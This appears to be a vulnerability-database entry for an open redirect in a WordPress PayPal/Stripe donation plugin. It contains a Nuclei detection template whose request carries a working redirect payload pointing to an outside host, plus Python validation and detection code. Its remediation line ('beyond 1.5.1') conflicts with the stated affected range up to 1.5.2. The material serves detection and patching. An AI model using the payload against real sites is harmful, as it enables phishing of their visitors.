
Accept Donations with PayPal <= 1.5.2 - Open Redirect

CVE-2025-68602
Verified

Description

The Accept Donations with PayPal & Stripe plugin for WordPress is vulnerable to Open Redirect in all versions up to, and including, 1.5.2. This is due to insufficient validation of the supplied redirect URL. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action.

Severity

Medium

CVSS Score

4.7

Exploit Probability

0%

Published Date

March 17, 2026

Template Author

shivam kamboj

CVE-2025-68602.yaml
id: CVE-2025-68602

info:
  name: Accept Donations with PayPal <= 1.5.2 - Open Redirect
  author: Shivam Kamboj
  severity: medium
  description: |
    The Accept Donations with PayPal & Stripe plugin for WordPress is vulnerable to Open Redirect in all versions up to, and including, 1.5.2. This is due to insufficient validation on the redirect url supplied. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action.
  impact: |
    Attackers can redirect users to malicious sites, facilitating phishing attacks and credential theft.
  remediation: |
    Update to the latest version beyond 1.5.1.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/easy-paypal-donation/accept-donations-with-paypal-152-unauthenticated-open-redirect
    - https://nvd.nist.gov/vuln/detail/CVE-2025-68602
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N
    cvss-score: 4.7
    cve-id: CVE-2025-68602
    epss-score: 0.00115
    epss-percentile: 0.29653
    cwe-id: CWE-601
  metadata:
    verified: true
    max-request: 1
  tags: cve,cve2025,wordpress,wp,wp-plugin,redirect,easy-paypal-donation,unauth

http:
  - method: GET
    path:
      - "{{BaseURL}}/?wpedon-stripe-checkout-redirect=1&sk=nucleitest&ai=nucleitest&si=nucleitest&rf=//oast.pro"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        part: body
        words:
          - 'src="https://js.stripe.com/v3/"'

      - type: word
        part: body
        words:
          - "let rf = '//oast.pro"

      - type: word
        part: body
        words:
          - "window.location.href = rf;"

    extractors:
      - type: regex
        name: open-redirect
        part: body
        regex:
          - "let rf = '([^']+)'"
# digest: 490a00463044022011f7b24cabbe4bb806d86e6eaa25364e8609ccc66330525e7d14ebe082f1ea890220450e3722ad333ee504a534f26b7463e8a6f0db41616ec0c31b4f3bf9471b5067:922c64590222798bb761d5b6d8e72950
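The description above attributes the issue to the unvalidated redirect parameter, and the template's matchers show how the value is echoed into a script that assigns it to window.location.href. The block below is an added example, not code from the plugin or the template: a validation check a fixed plugin should apply to rf (rejecting the protocol-relative form the template probes with), plus detection logic that reuses the template's own extractor regex to flag a response that would redirect off-site. The site host, response bodies and function names are constructed assumptions.

```python
import re
from urllib.parse import urlsplit

# Assumed hostname of the WordPress site being protected (constructed value).
SITE_HOST = "donations.example"
# Same extractor the template uses to pull the echoed redirect target from the body.
RF_PATTERN = re.compile(r"let rf = '([^']+)'")


def is_safe_redirect_target(rf: str, site_host: str = SITE_HOST) -> bool:
    """True only if rf can resolve to site_host; the template's probe //oast.pro fails."""
    if not rf or any(ord(c) < 0x21 or c == "\\" for c in rf):
        return False                      # control chars, whitespace, backslash
    try:
        parts = urlsplit(rf)
    except ValueError:                    # e.g. malformed IPv6 brackets
        return False
    if parts.scheme:                      # absolute URL: only http(s) to our own host
        return parts.scheme in ("http", "https") and parts.netloc.lower() == site_host
    if rf.startswith("//") or parts.netloc:
        return False                      # protocol-relative reference resolves off-site
    return rf.startswith("/")             # site-relative path only


def extract_redirect_target(body: str):
    """Return the rf value echoed into the page, or None if absent."""
    m = RF_PATTERN.search(body)
    return m.group(1) if m else None


def response_indicates_open_redirect(body: str, site_host: str = SITE_HOST) -> bool:
    """Flag a response that assigns an off-site rf to window.location.href."""
    rf = extract_redirect_target(body)
    return (rf is not None
            and "window.location.href = rf;" in body
            and not is_safe_redirect_target(rf, site_host))


# Constructed response bodies approximating the markup the template's matchers look for.
VULNERABLE_BODY = """<script src="https://js.stripe.com/v3/"></script>
<script>let rf = '//oast.pro'; window.location.href = rf;</script>"""
FIXED_BODY = """<script src="https://js.stripe.com/v3/"></script>
<script>let rf = '/donation-thanks/'; window.location.href = rf;</script>"""

if __name__ == "__main__":
    for rf in ("//oast.pro", "/donation-thanks/", "https://oast.pro/", "ftp://oast.pro/"):
        print(f"{rf!r:22} safe={is_safe_redirect_target(rf)}")
    print("vulnerable:", response_indicates_open_redirect(VULNERABLE_BODY),
          "fixed:", response_indicates_open_redirect(FIXED_BODY))
```

The host comparison is an exact match on the netloc, so a target carrying userinfo or a port for another host is rejected rather than parsed leniently.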

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N
CVE ID:
CVE-2025-68602
CWE ID:
CWE-601

References

https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/easy-paypal-donation/accept-donations-with-paypal-152-unauthenticated-open-redirect
https://nvd.nist.gov/vuln/detail/CVE-2025-68602

Remediation Steps

Update to the latest version beyond 1.5.1.